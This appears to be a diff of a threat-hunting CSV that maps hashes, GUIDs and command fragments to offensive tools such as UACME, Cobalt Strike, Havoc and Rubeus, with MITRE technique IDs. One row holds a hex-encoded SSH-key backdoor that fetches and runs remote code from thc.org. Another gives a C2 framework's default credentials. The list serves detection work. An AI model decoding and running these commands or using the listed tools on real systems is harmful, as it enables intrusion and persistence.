"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5dec1cfe7c0c2ec55c17fb44b43f7d14*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" -"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*639EF517-FCFC-408E-9500-71F0DC0458DB*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*-64 -format=reflective-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*6563686f2048656c6c6f204261636b646f6f72*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*7.exe a -mx3 ad.7z ad_*.txt*","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 